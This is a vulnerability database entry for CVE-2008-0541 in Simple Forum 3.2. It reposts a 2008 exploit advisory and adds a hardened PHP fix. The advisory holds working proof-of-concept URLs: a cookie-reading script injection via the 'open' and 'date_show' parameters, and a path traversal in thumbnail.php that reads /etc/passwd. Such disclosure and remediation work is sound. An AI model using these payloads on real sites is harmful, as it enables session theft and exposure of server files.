Gerd Tentler Simple Forum forum.php Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1114403    Vulnerability type: Cross-site scripting
Published: 2008-01-26    Updated: 2008-09-05
CVE: CVE-2008-0541    CNNVD-ID: CNNVD-200802-008
Platform: PHP    CVSS score: 4.3
|Source
https://www.exploit-db.com/exploits/4989
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200802-008
|Vulnerability details
Multiple cross-site scripting vulnerabilities in forum.php in Gerd Tentler Simple Forum 3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) open and (2) date_show parameters, which are read from the request and echoed back into a hidden form field without encoding.
|Exploit
########################################################
#                                                      #
# SIMPLE FORUM v 3.2 MULTIPLE VULNERABILITIES          #
# author      : tomplixsee                             #
# my email    : tomplixsee@yahoo.co.id                 #
#                                                      #
# software    : SIMPLE FORUM v3.2                      #
# download    : http://www.gerd-tentler.de/tools/forum/#
#                                                      #
########################################################


1. XSS
  vulnerable code on forum.php
  
  <?
  .....
  // request parameters are copied into variables with no validation
  if(isset($_REQUEST['date_show'])) $date_show = $_REQUEST['date_show'];
  .....
  if(isset($_REQUEST['open'])) $open = $_REQUEST['open'];
  .....
  // the raw values are echoed into an HTML attribute without htmlspecialchars(),
  // so a quote in the input closes the attribute and the rest is rendered as markup
  <input type="hidden" name="date_show" value="<? echo $date_show; ?>">
  <input type="hidden" name="open" value="<? echo $open; ?>">
  .....
example:
  http://target/path/forum.php?open="/><script>alert(document.cookie)</script>
  http://target/path/forum.php?date_show="/><script>alert(document.cookie)</script>


2. Remote File Disclosure
  vulnerable code on thumbnail.php
  
  <?
  ....
  // the file name is taken straight from the request and never checked
  // against a base directory, so "../" sequences are honoured by readfile()
  if(isset($_REQUEST['file'])) $file = $_REQUEST['file'];
  if(isset($_REQUEST['type'])) $type = $_REQUEST['type'];
  ....
  switch($type) {
      case 1:
        if($img && function_exists('ImageGIF')) {
          header('Content-type: image/gif');
          @ImageGIF($img);
        }
        else if($img && function_exists('ImagePNG')) {
          header('Content-type: image/png');
          @ImagePNG($img);
        }
        else {
          header('Content-type: image/gif');
          readfile($file);   // fallback sends the attacker-chosen file verbatim
        }
      break;

      case 2:
        header('Content-type: image/jpeg');
        if($img && function_exists('ImageJPEG')) @ImageJPEG($img);
        else readfile($file);
      break;

      case 3:
        header('Content-type: image/png');
        if($img && function_exists('ImagePNG')) @ImagePNG($img);
        else readfile($file);
      break;
  }
  ....
  ?>

example:
 http://target/path/thumbnail.php?type=3&file=../../../../../../../etc/passwd
 then try to view the page source :D



greetings to:
ira, sukabirus network community, akillers 179, bidulux, sibalbal, crutz_ao,

# milw0rm.com [2008-01-26]
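Both issues above come down to trusting request data: forum.php echoes it into HTML, thumbnail.php passes it to readfile(). The following is an added example (not Simple Forum's code and not part of the original advisory) showing the hardened form of each pattern. It assumes the forum keeps its thumbnails under an `images` directory next to the script, and the helper names `html_attr` and `safe_image_path` are hypothetical; the GD branches of the original switch are left out so the path check stays in focus. It needs PHP 7.1 or later for the type declarations.

```php
<?php
// Added example, not Simple Forum's own code.
// Part 1: output encoding for forum.php.
// Every value that lands inside an HTML attribute goes through htmlspecialchars()
// with ENT_QUOTES, so neither " nor ' can terminate the attribute and nothing
// after it is parsed as markup.
function html_attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$date_show = isset($_REQUEST['date_show']) ? (string) $_REQUEST['date_show'] : '';
$open      = isset($_REQUEST['open'])      ? (string) $_REQUEST['open']      : '';

echo '<input type="hidden" name="date_show" value="' . html_attr($date_show) . '">';
echo '<input type="hidden" name="open" value="' . html_attr($open) . '">';

// Part 2: path containment for thumbnail.php.
// The requested name is resolved relative to a fixed base directory; realpath()
// collapses any "..", so a traversal attempt shows up as a path that no longer
// starts with the base and is refused. Returns null for anything not allowed.
function safe_image_path(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;                                  // base directory missing
    }
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;                                  // empty or NUL-byte name
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false) {
        return null;                                  // does not exist
    }
    // Prefix check with the trailing separator so "images2" does not pass for "images".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                                  // escaped the base directory
    }
    if (!is_file($candidate)) {
        return null;
    }
    // Serve only files whose extension matches what this handler is for.
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!in_array($ext, ['gif', 'jpg', 'jpeg', 'png'], true)) {
        return null;
    }
    return $candidate;
}

// Map the numeric type to a content type instead of trusting the file name.
$types = [1 => 'image/gif', 2 => 'image/jpeg', 3 => 'image/png'];
$type  = isset($_REQUEST['type']) ? (int) $_REQUEST['type'] : 0;
$file  = isset($_REQUEST['file']) ? (string) $_REQUEST['file'] : '';

$path = safe_image_path(__DIR__ . '/images', $file);   // assumed thumbnail directory
if ($path === null || !isset($types[$type])) {
    http_response_code(404);                            // same answer for every rejection
    exit;
}
header('Content-Type: ' . $types[$type]);
readfile($path);
```

Two design points worth noting. The containment check deliberately rejects with a plain 404 rather than echoing the rejected name back, so the error path cannot itself become an injection point. And encoding at output (rather than stripping characters at input) is what closes the XSS: the same `$open` value may later be compared or stored, and mangling it on the way in would break those uses without guaranteeing that every output site is covered.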
|References

Source: BID
Name: 27463
Link: http://www.securityfocus.com/bid/27463
Source: MILW0RM
Name: 4989
Link: http://www.milw0rm.com/exploits/4989
Source: XF
Name: simpleforum-forum-xss(39978)
Link: http://xforce.iss.net/xforce/xfdb/39978
Source: SECUNIA
Name: 28681
Link: http://secunia.com/advisories/28681